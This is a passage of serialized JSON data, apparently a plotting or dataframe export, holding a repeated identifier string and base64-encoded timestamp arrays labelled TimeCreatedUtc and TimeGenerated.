09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"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Yo12QgBQdoFijXZCADCZiGKNdkIAEJuIYo12QgAQjYxijXZCAFCOjGKNdkIAsLqRYo12QgAg7ZFijXZCAPD3kWKNdkIAcPmRYo12QgBw+pFijXZCAHAnl2KNdkIAgCiXYo12QgDAVpxijXZCAABYnGKNdkIA0IWhYo12QgAwiaFijXZCAKDupmKNdkIAgPCmYo12QgCwHaxijXZCADAfrGKNdkIAYEyxYo12QgBATrFijXZCAAB6tmKNdkIAEHu2Yo12QgDQprtijXZCAECou2KNdkIAcNTAYo12QgCA1sBijXZCAJAAxmKNdkIA0AHGYo12QgBwL8tijXZCAMAxy2KNdkIAsFzQYo12QgCAXdBijXZCAJCL1WKNdkIAoI3VYo12QgCQudpijXZCAPC92mKNdkIAEKfgYo12QgDwp+BijXZCAMBG6GKNdkIAcEjoYo12QgAAiehijXZCAHDM5GSNdkIA0LRTaI12QgDwJI9qjXZCANAW6mqNdkIAsBfqao12QgAAnMJrjXZCAPD4t2yNdkIA8Pm3bI12QgDQBbhsjXZCALAGuGyNdkIAsAe4bI12QgAwu7tsjXZCAEC8u2yNdkIA8GnAbI12QgAwa8BsjXZCAKAVxmyNdkIAsE7GbI12QgDAWcZsjXZCAJBaxmyNdkIAcFvGbI12QgDgXMZsjXZCACBexmyNdkIAcGDGbI12QgAQYsZsjXZCACBjxmyNdkIAkGTGbI12QgAwZcZsjXZCALBmxmyNdkIAIGjGbI12QgDwaMZsjXZCABBrxmyNdkIA4GvGbI12QgDwbMZsjXZCAEBwxmyNdkIAIO/GbI12QgCQ8MZsjXZCAFAoyWyNdkIAkCnJbI12QgBQmM1sjXZCADCazWyNdkIAUNLPbI12QgBg089sjXZCAKDH0myNdkIAgMnSbI12QgBA9ddsjXZCACD312yNdkIAYPjXbI12QgBw+ddsjXZCANCo3GyNdkIAcNzcbI12QgAQ5txsjXZCAODm3GyNdkIAUOjcbI12QgAQl+FsjXZCACCY4WyNdkIAcEXmbI12QgCwRuZsjXZCALD26myNdkIA0CbrbI12QgBw8O9sjXZCABDy72yNdkIAcK/0bI12QgCwsPRsjXZCAABf+WyNdkIAcGD5bI12QgAwD/5sjXZCAEAQ/myNdkIAkL0CbY12QgAAvwJtjXZCALBrB22NdkIAkG0HbY12QgCQHQxtjXZCAJAeDG2NdkIAYM4QbY12QgCQ/xBtjXZCABCtFW2NdkIA4K0VbY12QgCQWxptjXZCANBcGm2NdkIAMAsfbY12QgBQDx9tjXZCAABMIG2NdkIAEE0gbY12QgAgxSJtjXZCANDGIm2NdkIAMO4obY12QgAwhDFvjXZCANBroHKNdkIAsFmuc412QgAQ03R0jXZCADBUD3aNdkIAULAEd412QgBQsQR3jXZCAAC9BHeNdkIA0L0Ed412QgAQvwR3jXZCACDuCHeNdkIAMO8Id412QgAw3A13jXZCALDdDXeNdkIAUFUQd412QgAQhhB3jXZCAFCQEHeNdkIAUJEQd412QgBgkhB3jXZCADCTEHeNdkIAcJQQd412QgBwnRB3jXZCABCfEHeNdkIA8KAQd412QgAwohB3jXZCAOCjEHeNdkIAsKQQd412QgBgphB3jXZCABCoEHeNdkIAgKkQd412QgCAsxB3jXZCAGC1EHeNdkIAMLYQd412QgCwtxB3jXZCADC7EHeNdkIAIN8Xd412QgAw4Rd3jXZCABDUG3eNdkIAENUbd412QgDwwSB3jXZCANDDIHeNdkIAUPQkd412QgBQ9SR3jXZCADAYLHeNdkIA4Bksd412QgBATS93jXZCAFBPL3eNdkIAgEAzd412QgCQQTN3jXZCAEByN3eNdkIAEKQ3d412QgDQrTd3jXZCALCuN3eNdkIAsK83d412QgBA4Tt3jXZCAFDiO3eNdkIAwD5Ad412QgBwQEB3jXZCAFBxRHeNdkIAIKNEd412QgDw0Uh3jXZCANDTSHeNdkIAcAJNd412QgCwA013jXZCAJAzUXeNdkIAQDVRd412QgDAZVV3jXZCAJBmVXeNdkIAIJhZd412QgCQmVl3jXZCAODJXXeNdkIAMMxdd412QgBw/GF3jXZCAID9YXeNdkIAkC1md412QgBgX2Z3jXZCAPCQaneNdkIAwJFqd412QgDgwm53jXZCAJDEbneNdkIAcPRyd412QgBg+HJ3jXZCAHCld3eNdkIAsKZ3d412QgBwEn13jXZCAOATfXeNdkIAQAWBd412QgDgf+N3jXZCANA8fnmNdkIAAEYOe412QgDQRg57jXZCAHAk7XyNdkIA0B+MR412QgAAByt/jXZCADAMXICNdkIAIGlR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\",\"dtype\":\"float64\",\"shape\":[1010]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAEADKPY12QgAQvpdIjXZCACDrmUiNdkIAcFlbSY12QgCAhOBJjXZCAJCrEkyNdkIAwNsUTI12QgAwbk9NjXZCAEC2202NdkIAwPTbTY12QgCQ9dtNjXZCAJBK3E2NdkIAUFPcTY12QgCQXdxNjXZCACBT3E2NdkIAUFjcTY12QgDQadxNjXZCAFBs3E2NdkIAAG7cTY12QgCAcNxNjXZCADBz3E2NdkIAQMPdTY12QgCww91NjXZCAPDJ3U2NdkIAkMrdTY12QgBwNt5NjXZCABA33k2NdkIAAGrqTY12QgCgaupNjXZCAJDhCE6NdkIAoOIITo12QgAwhY1OjXZCAHCGjU6NdkIAcIqNTo12QgBQjY1OjXZCAHCmqE6NdkIAYDupTo12QgAQPJVPjXZCABA9lU+NdkIAcOxwUI12QgDw7XBQjXZCAHCwTFGNdkIA0LRMUY12QgDApXdRjXZCAGCmd1GNdkIAcCQEU412QgDwJQRTjXZCAOCgllONdkIAsKGWU412QgCgl7tUjXZCAHCYu1SNdkIA8I3mVI12QgCQjuZUjXZCAEAMc1aNdkIAEA1zVo12QgBQDXNWjXZCAAAQc1aNdkIA0H8qWI12QgCwgCpYjXZCANB2VViNdkIA0HdVWI12QgAQeE9ZjXZCAOB4T1mNdkIA0PPhWY12QgCA9eFZjXZCAHBomVuNdkIAUGmZW412QgAwX8RbjXZCAKBfxFuNdkIAcOQrXI12QgAQ5StcjXZCALDcUF2NdkIAsN1QXY12QgDgUAhfjXZCALBRCF+NdkIAsFEIX412QgAgUghfjXZCAKBHM1+NdkIAQEgzX412QgBAxL9gjXZCAIDFv2CNdkIAoLvkYY12QgBwvORhjXZCALA4d2KNdkIAUDl3Yo12QgAQMKJijXZCAHAwomKNdkIA4KwuZI12QgDAri5kjXZCANAnwWSNdkIAcCjBZI12QgDQH+ZljXZCABAh5mWNdkIAEBgRZo12QgCwGBFmjXZCALCUnWeNdkIA8JWdZ412QgBQlZ1njXZCACCWnWeNdkIAQAhVaY12QgBQCVVpjXZCALABgGmNdkIAIAKAaY12QgCg/3lqjXZCAHAAemqNdkIAEH0Ma412QgDwfQxrjXZCAHDww2yNdkIAUPHDbI12QgBQ6u5sjXZCAPDq7myNdkIA8G1WbY12QgCQblZtjXZCABBle26NdkIAIGZ7bo12QgAQ2DJwjXZCAODYMnCNdkIA4NgycI12QgBQ2TJwjXZCAGDTXXCNdkIA0NNdcI12QgCgS+pxjXZCALBM6nGNdkIAcEQPc412QgBQRQ9zjXZCAODAoXONdkIA8MGhc412QgDQu8xzjXZCADC8zHONdkIAcDRZdY12QgCANVl1jXZCABCw63WNdkIAsLDrdY12QgCwqBB3jXZCAJCvEHeNdkIA0KQ7d412QgCwpTt3jXZCAKAbyHiNdkIAsBzIeI12QgBwHMh4jXZCAOAcyHiNdkIA0I9/eo12QgDgkH96jXZCADCMqnqNdkIA0Iyqeo12QgBAiKR7jXZCABCJpHuNdkIA0AM3fI12QgDgBDd8jXZCAKB37n2NdkIAsHjufY12QgAQdRl+jXZCALB1GX6NdkIA4PSAfo12QgCA9YB+jXZCABDtpX+NdkIAIO6lf412QgCgX12BjXZCALBgXYGNdkIAcGBdgY12QgDgYF2BjXZCAHDU202NdkIAoOLbTY12QgBQB9xNjXZCAHBR3E2NdkIAwI/cT